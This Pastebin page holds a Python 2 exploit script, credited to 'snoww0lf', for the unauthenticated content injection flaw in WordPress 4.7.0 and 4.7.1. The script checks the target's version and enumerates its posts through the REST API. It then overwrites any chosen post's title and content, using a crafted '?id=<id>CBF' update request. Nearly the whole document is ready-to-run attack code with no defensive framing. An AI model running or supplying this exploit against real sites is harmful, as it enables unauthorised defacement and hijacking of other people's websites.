Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #! /usr/bin/env python
- """
- Technical Explanation: https://blog.sucuri.net/2017/02/content-injection-vulnerability-wordpress-rest-api.html
- REST API Wordpress reference: https://developer.wordpress.org/rest-api/reference/posts/#update-a-post
- Wordpress Version Affected: 4.7.0/4.7.1
- 2017 - Coded by snoww0lf.
- """
- import re
- import json
- import urllib2
- class WpContent:
- def __init__(self, url):
- self.__url = url
- self.__response = urllib2.urlopen(self.__url).read()
- def get_api_wp(self):
- return re.findall(r"https://api.w.org/' href='(.*)'", self.__response)[0]
- def get_wp_version(self):
- check_version = re.findall(r'ver=(.*)"', self.__response)[0]
- if check_version == "4.7" or check_version == "4.7.1":
- check_version += " ( Maybe vulnerable to inject ) "
- else:
- check_version += " ( Maybe not vulnerable to inject ) "
- return check_version
- def get_wp_post_information(self):
- get_post = urllib2.urlopen(self.get_api_wp()+"wp/v2/posts").read()
- load_info = json.loads(get_post)
- collected_information = ""
- for load in load_info:
- collected_information += "[x] Post ID: {0}\n[x] Post Title: {1}\n[x] Post URL: {2}\n[x] Post Content: {3} [SNIPPET]\n\n".\
- format(load['id'], load['title']['rendered'].encode("utf-8"), load['link'], load['content']['rendered'][:100].encode('utf-8'))
- return collected_information
- def inject_content(self, id_content, title, content):
- data = json.dumps({
- 'title':title,
- 'content':content
- })
- params = {'Content-Type':'application/json'}
- full_url = self.get_api_wp() + "wp/v2/posts/{0}/?id={0}CBF".format(id_content)
- req = urllib2.Request(full_url, data, params)
- resp = urllib2.urlopen(req).read()
- return resp
- def main():
- print("[X] WORDPRESS 4.7.0/4.7.1 CONTENT INJECTION EXPLOIT BY snoww0lf [X]\n")
- while True:
- url = raw_input("[x] Enter the URL: ")
- print("[?] Please wait ...\n")
- wpcontent = WpContent(url)
- wp_version = wpcontent.get_wp_version().split()[0]
- print("[x] Wordpress Version: {0} ".format(wp_version))
- if(wp_version == "4.7" or wp_version == "4.7.1"):
- select = raw_input("[x] It's affected version. It seems vulnerable, continue? [y/n] ").lower()
- while(select != "y" and select != "n"):
- print("[x] Wrong selection! Try again.")
- select = raw_input("[x] Affected version. Seems vulnerable, continue? [y/n] ").lower()
- print("\n")
- if(select == "y"):
- print("[x] Parsing data information, please wait ...\n")
- wp_information = wpcontent.get_wp_post_information()
- print(wp_information)
- inp_id = input("[x] Enter ID Content that you want to overwrite: ")
- inp_title = raw_input("[x] Change title: ")
- print("\n")
- print("=> 1. Load data from file.")
- print("=> 2. Input data.")
- print("\n")
- mode = input("[x] Change content by [1/2] ? ")
- if mode == 1:
- dfile = raw_input("[x] Enter the filename: ")
- with open(dfile, 'r') as f:
- readf = f.readlines()
- print("[x] Exploit in progress ...\n")
- wpcontent.inject_content(inp_id, inp_title, ''.join(readf))
- else:
- inp_data = raw_input("[?] Input data: ")
- print("[x] Exploit in progress ...\n")
- wpcontent.inject_content(inp_id, inp_title, inp_data)
- print("[x] Update success!\n")
- cont = raw_input("[?] Continue ? [y/n] ").lower()
- while(cont != "y" and cont != "n"):
- print("[x] Wrong selection! Try again.")
- cont = raw_input("[?] Continue ? [y/n] ").lower()
- if cont == "n": break
- else:
- break
- else:
- cont = raw_input("[?] Continue ? ").lower()
- while(cont != "y" and cont != "n"):
- print("[x] Wrong selection! Try again.")
- cont = raw_input("[?] Continue ? ").lower()
- if cont == "n": break
- if __name__ == '__main__':
- main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement